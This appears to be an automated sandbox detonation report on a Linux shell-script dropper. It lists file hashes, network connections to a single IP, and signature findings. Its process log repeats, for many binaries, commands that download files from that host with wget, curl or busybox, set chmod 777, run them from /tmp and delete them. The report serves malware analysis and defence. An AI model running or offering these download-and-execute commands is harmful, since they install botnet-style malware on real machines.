[wget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/bin/chmod

[chmod 777 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f

[./2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/bin/rm

[rm 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/usr/bin/wget

[wget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/bin/chmod

[chmod 777 MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P

[./MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/bin/rm

[rm MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/usr/bin/wget

[wget http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/bin/chmod

[chmod 777 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe

[./6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/bin/rm

[rm 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/usr/bin/wget

[wget http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/bin/chmod

[chmod 777 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy

[./8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/bin/rm

[rm 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-25 02:54

Reported

2024-11-25 02:57

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

39s

Max time network

131s

Command Line

[/tmp/b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 N/A
N/A /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 N/A
N/A /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs N/A
N/A /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q N/A
N/A /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF N/A
N/A /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB N/A
N/A /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av N/A
N/A /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC N/A
N/A /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL N/A
N/A /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P N/A
N/A /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe N/A
N/A /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy N/A
N/A /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu N/A
N/A /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f N/A
N/A /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 N/A
N/A /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF N/A
N/A /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB N/A
N/A /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av N/A
N/A /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC N/A
N/A /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 N/A
N/A /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs N/A
N/A /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q N/A
N/A /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL N/A
N/A /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu N/A
N/A /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f N/A
N/A /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P N/A
N/A /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe N/A
N/A /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu /usr/bin/curl N/A
File opened for modification /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 /usr/bin/curl N/A
File opened for modification /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f /usr/bin/curl N/A
File opened for modification /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe /usr/bin/curl N/A
File opened for modification /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 /usr/bin/curl N/A
File opened for modification /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 /usr/bin/curl N/A
File opened for modification /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q /usr/bin/curl N/A
File opened for modification /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs /usr/bin/curl N/A
File opened for modification /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy /usr/bin/curl N/A
File opened for modification /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs /usr/bin/curl N/A
File opened for modification /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF /usr/bin/curl N/A
File opened for modification /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f /usr/bin/curl N/A
File opened for modification /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av /usr/bin/curl N/A
File opened for modification /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P /usr/bin/curl N/A
File opened for modification /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 /usr/bin/curl N/A
File opened for modification /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av /usr/bin/curl N/A
File opened for modification /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF /usr/bin/curl N/A
File opened for modification /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB /usr/bin/curl N/A
File opened for modification /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC /usr/bin/curl N/A
File opened for modification /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe /usr/bin/curl N/A
File opened for modification /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q /usr/bin/curl N/A
File opened for modification /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB /usr/bin/curl N/A
File opened for modification /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC /usr/bin/curl N/A
File opened for modification /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL /usr/bin/curl N/A
File opened for modification /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu /usr/bin/curl N/A
File opened for modification /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P /usr/bin/curl N/A
File opened for modification /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy /usr/bin/curl N/A
File opened for modification /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL /usr/bin/curl N/A

Processes

/tmp/b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh

[/tmp/b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/bin/chmod

[chmod 777 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59

[./Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/bin/rm

[rm Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/usr/bin/wget

[wget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/bin/chmod

[chmod 777 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7

[./RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/bin/rm

[rm RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/usr/bin/wget

[wget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/bin/chmod

[chmod 777 CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs

[./CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/bin/rm

[rm CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/usr/bin/wget

[wget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/bin/chmod

[chmod 777 QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q

[./QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/bin/rm

[rm QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/usr/bin/wget

[wget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/bin/chmod

[chmod 777 z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF

[./z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/bin/rm

[rm z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/usr/bin/wget

[wget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/bin/chmod

[chmod 777 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB

[./8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/bin/rm

[rm 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/usr/bin/wget

[wget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/bin/chmod

[chmod 777 nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av

[./nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/bin/rm

[rm nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/usr/bin/wget

[wget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/bin/chmod

[chmod 777 roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC

[./roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/bin/rm

[rm roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/usr/bin/wget

[wget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/bin/chmod

[chmod 777 i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL

[./i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/bin/rm

[rm i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/usr/bin/wget

[wget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/bin/chmod

[chmod 777 MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P

[./MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/bin/rm

[rm MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/usr/bin/wget

[wget http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/bin/chmod

[chmod 777 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe

[./6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/bin/rm

[rm 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/usr/bin/wget

[wget http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/bin/chmod

[chmod 777 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy

[./8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/bin/rm

[rm 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/usr/bin/wget

[wget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/bin/chmod

[chmod 777 xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu

[./xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/bin/rm

[rm xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/usr/bin/wget

[wget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/bin/chmod

[chmod 777 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f

[./2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/bin/rm

[rm 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/usr/bin/wget

[wget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/bin/chmod

[chmod 777 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59

[./Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/bin/rm

[rm Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/usr/bin/wget

[wget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/bin/chmod

[chmod 777 z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF

[./z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/bin/rm

[rm z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/usr/bin/wget

[wget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/bin/chmod

[chmod 777 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB

[./8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/bin/rm

[rm 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/usr/bin/wget

[wget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/bin/chmod

[chmod 777 nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av

[./nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/bin/rm

[rm nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/usr/bin/wget

[wget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/bin/chmod

